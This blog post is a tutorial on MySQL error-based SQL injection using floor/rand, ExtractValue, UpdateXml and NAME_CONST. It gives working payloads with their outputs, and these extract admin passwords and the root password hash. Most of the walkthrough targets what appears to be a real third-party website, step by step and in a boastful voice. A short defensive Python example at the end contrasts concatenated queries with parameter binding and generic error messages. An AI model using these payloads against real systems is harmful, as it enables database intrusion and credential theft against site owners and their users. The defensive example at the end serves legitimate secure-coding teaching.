
MySQL: three error-based injection techniques (floor, ExtractValue, UpdateXml)

Posted 2015-11-11 19:03:37

1. Triggering the error with floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked through the error message. To retrieve other data, replace the version() expression with another subquery.
For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected examples:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)
+------+
| TEST |
+------+
|    1 |
+------+
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
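Every technique on this page depends on the same two application defects: the id parameter is pasted into the SQL text, and the database engine's error message is returned to the client, which turns the error text into a data channel. The Python program below is an added example, not code from the post or from the application it targets. It implements the article lookup both ways against an in-memory sqlite3 database that stands in for MySQL (the functions in the payloads do not exist in SQLite, so they fail with a "no such function" error, which is enough to show the leak). The table layout and contents are constructed to mirror the post's examples, and the post's own payload strings are used purely as input data.

```python
import logging
import sqlite3

log = logging.getLogger("article")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory demo schema mirroring the post's article/admin tables.
    sqlite3 stands in for MySQL; only the query-building pattern matters here."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT);"
        "INSERT INTO article VALUES (1, 'test', 'do it');"
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, pass TEXT);"
        "INSERT INTO admin VALUES (1, 'admin888');"
    )
    return conn


def fetch_article_vulnerable(conn: sqlite3.Connection, user_id: str) -> dict:
    """The anti-pattern behind every example in the post: the request parameter is
    pasted into the SQL text, and the engine's error text is echoed to the client."""
    sql = f"SELECT id, title, content FROM article WHERE id = {user_id}"
    try:
        return {"row": conn.execute(sql).fetchone(), "error": None}
    except sqlite3.Error as exc:
        return {"row": None, "error": f"DB error: {exc}"}  # leaks engine internals


def fetch_article_hardened(conn: sqlite3.Connection, user_id: str) -> dict:
    """Bound parameter: the whole input is one literal compared against id, so it can
    never become SQL syntax. Errors go to the server log and the client gets a
    generic message, which removes the oracle that error-based injection needs."""
    sql = "SELECT id, title, content FROM article WHERE id = ?"
    try:
        return {"row": conn.execute(sql, (user_id,)).fetchone(), "error": None}
    except sqlite3.Error as exc:
        log.warning("article lookup failed: %s", exc)
        return {"row": None, "error": "request failed"}


# Payload strings copied from the post, used here only as inert input values.
PAYLOADS = [
    "1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))",
    "1 and 1=(updatexml(1,concat(0x3a,(select user())),1))",
]


def compare(user_id: str) -> dict:
    """Run the same input through both implementations on a fresh demo database."""
    conn = make_db()
    return {
        "vulnerable": fetch_article_vulnerable(conn, user_id),
        "hardened": fetch_article_hardened(conn, user_id),
    }


if __name__ == "__main__":
    for value in ["1"] + PAYLOADS:
        print(repr(value), "->", compare(value))
```

With a legitimate id both paths return the article row. With a payload, the concatenating version hands the engine's error text back to the caller, exactly the channel the post reads version strings and password hashes through; the bound version simply finds no row and reports nothing about the database. Rejecting non-numeric ids before the query is a sensible extra layer, but parameter binding is the fix that holds regardless of which database function an attacker reaches for.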
